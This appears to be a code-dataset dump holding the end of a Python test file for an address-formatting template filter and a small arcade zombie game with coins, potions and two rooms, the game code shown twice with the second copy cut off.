metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0]) | en | 0.494334 | # coding: utf-8 # pylint: disable=too-many-public-methods # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given no test for integers this check was removed from jinja_filters # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # Given # When # Then # (Input Date, offset, day of week, expected output) # Friday outputs previous Sunday # Sunday outputs previous Sunday (Must be a full Sunday) # Monday outputs previous Sunday # Previous sunday with -1 day offset # Previous sunday with +1 month offset, back to input # Friday outputs previous Friday # Ensure we can handle datetime input # Friday outputs previous Friday + 4 weeks # Friday outputs previous Friday + nothing # Friday outputs previous Friday + 1 year # Friday outputs previous Friday + 1 year + 1 week + 1 day # pylint: disable=unnecessary-lambda # Input Date, date format, show year # Start Date, End Date, Date Format, Output Expected First, Output Expected Second # pylint: disable=no-self-use # (input list, expected output) # Format unordered list takes a list of lists | 2.368902 | 2 |
levels/sombie.py | superhasduper/PythonGames | 1 | 8037 | import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
class Room:
"""
This class holds all the information about the
different rooms.
"""
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.wall_list = None
self.coin_list = None
self.door_list = None
self.smallpotion_list = None
self.bigpotion_list = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.score = 0
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
# This y loops a list of two, the coordinate 0, and just under the top of window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self, width, height):
"""
Initializer
"""
super().__init__(width, height,"Tocate el pnnywise")
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
# Sprite lists
self.current_room = 0
# Set up the player
self.game_over = False
self.door_list = None
self.rooms = None
self.score = 0
self.coin_list = None
self.player_sprite = None
self.physics_engine = None
self.smallpotion_list = None
self.bigpotion_list = None
def setup(self):
""" Set up the game and initialize the variables. """
# Set up the player
self.player_sprite = arcade.AnimatedWalkingSprite()
self.score = 0
self.coin_list = arcade.SpriteList()
self.smallpotion_list = arcade.SpriteList()
self.bigpotion_list = arcade.SpriteList()
self.player_sprite.center_x = 100
self.player_sprite.center_y = 150
character_scale = 0.75
self.player_sprite.stand_right_textures = []
self.player_sprite.stand_right_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale))
self.player_sprite.stand_left_textures = []
self.player_sprite.stand_left_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_right_textures = []
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale))
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale))
self.player_sprite.walk_left_textures = []
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_left_textures.append(arcade.load_texture("zombie_walk2.png",
scale=character_scale, mirrored=True))
# Our list of rooms
self.rooms = []
# Create the rooms. Extend the pattern for each room.
room = setup_room_1()
self.rooms.append(room)
room = setup_room_2()
self.rooms.append(room)
# Our starting room number
self.current_room = 0
# Create a physics engine for this room
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].wall_list)
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite, self.rooms[self.current_room].door_list)
def on_draw(self):
"""
Render the screen.
"""
# This command has to happen before we start drawing
arcade.start_render()
# Draw the background texture
arcade.draw_texture_rectangle(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2,
SCREEN_WIDTH, SCREEN_HEIGHT, self.rooms[self.current_room].background)
# Draw all the walls in this room
self.rooms[self.current_room].door_list.draw()
self.rooms[self.current_room].wall_list.draw()
self.rooms[self.current_room].coin_list.draw()
self.rooms[self.current_room].bigpotion_list.draw()
self.rooms[self.current_room].smallpotion_list.draw()
# If you have coins or monsters, then copy and modify the line
# above for each list.
output = "Score: {}".format(self.score)
arcade.draw_text(output, 10, 20, arcade.color.WHITE, 14)
self.player_sprite.draw()
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.W:
self.player_sprite.change_y = MOVEMENT_SPEED
elif key == arcade.key.S:
self.player_sprite.change_y = -MOVEMENT_SPEED
elif key == arcade.key.A:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif key == arcade.key.D:
self.player_sprite.change_x = MOVEMENT_SPEED
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.W or key == arcade.key.S:
self.player_sprite.change_y = 0
elif key == arcade.key.A or key == arcade.key.D:
self.player_sprite.change_x = 0
def update(self, delta_time):
""" Movement and game logic """
self.player_sprite.update_animation()
# Call update on all sprites (The sprites don't do much in this
# example though.)
self.physics_engine.update()
# Do some logic here to figure out what room we are in, and if we need to go
# to a different room.
if self.player_sprite.center_x > SCREEN_WIDTH and self.current_room == 0:
self.current_room = 1
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = 0
elif self.player_sprite.center_x < 0 and self.current_room == 1:
self.current_room = 0
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = SCREEN_WIDTH
hit_list = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].coin_list)
hit_list2 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].bigpotion_list)
hit_list3 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].smallpotion_list)
for coin in hit_list:
coin.kill()
self.score += 1
my_sound = arcade.load_sound("coinsound.wav")
arcade.play_sound(my_sound)
if self.score == 4:
for i in self.rooms[self.current_room].door_list:
i.kill()
your_sound = arcade.load_sound("door.wav")
arcade.play_sound(your_sound)
for smallpotion in hit_list3:
smallpotion.kill()
self.player_sprite.scale=0.5
tu_sound = arcade.load_sound("shrink.wav")
arcade.play_sound(tu_sound)
for bigpotion in hit_list2:
bigpotion.kill()
self.player_sprite.scale=1
yo_sound = arcade.load_sound("grow.wav")
arcade.play_sound(yo_sound)
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main() | import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
class Room:
"""
This class holds all the information about the
different rooms.
"""
def __init__(self):
# You may want many lists. Lists for coins, monsters, etc.
self.wall_list = None
self.coin_list = None
self.door_list = None
self.smallpotion_list = None
self.bigpotion_list = None
# This holds the background images. If you don't want changing
# background images, you can delete this part.
self.background = None
self.score = 0
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
# This y loops a list of two, the coordinate 0, and just under the top of window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self, width, height):
"""
Initializer
"""
super().__init__(width, height,"Tocate el pnnywise")
# Set the working directory (where we expect to find files) to the same
# directory this .py file is in. You can leave this out of your own
# code, but it is needed to easily run the examples using "python -m"
# as mentioned at the top of this program.
file_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(file_path)
# Sprite lists
self.current_room = 0
# Set up the player
self.game_over = False
self.door_list = None
self.rooms = None
self.score = 0
self.coin_list = None
self.player_sprite = None
self.physics_engine = None
self.smallpotion_list = None
self.bigpotion_list = None
def setup(self):
""" Set up the game and initialize the variables. """
# Set up the player
self.player_sprite = arcade.AnimatedWalkingSprite()
self.score = 0
self.coin_list = arcade.SpriteList()
self.smallpotion_list = arcade.SpriteList()
self.bigpotion_list = arcade.SpriteList()
self.player_sprite.center_x = 100
self.player_sprite.center_y = 150
character_scale = 0.75
self.player_sprite.stand_right_textures = []
self.player_sprite.stand_right_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale))
self.player_sprite.stand_left_textures = []
self.player_sprite.stand_left_textures.append(arcade.load_texture("zombie_stand.png",
scale=character_scale, mirrored=True))
self.player_sprite.walk_right_textures = []
self.player_sprite.walk_right_textures.append(arcade.load_texture("zombie_walk1.png",
scale=character_scale))
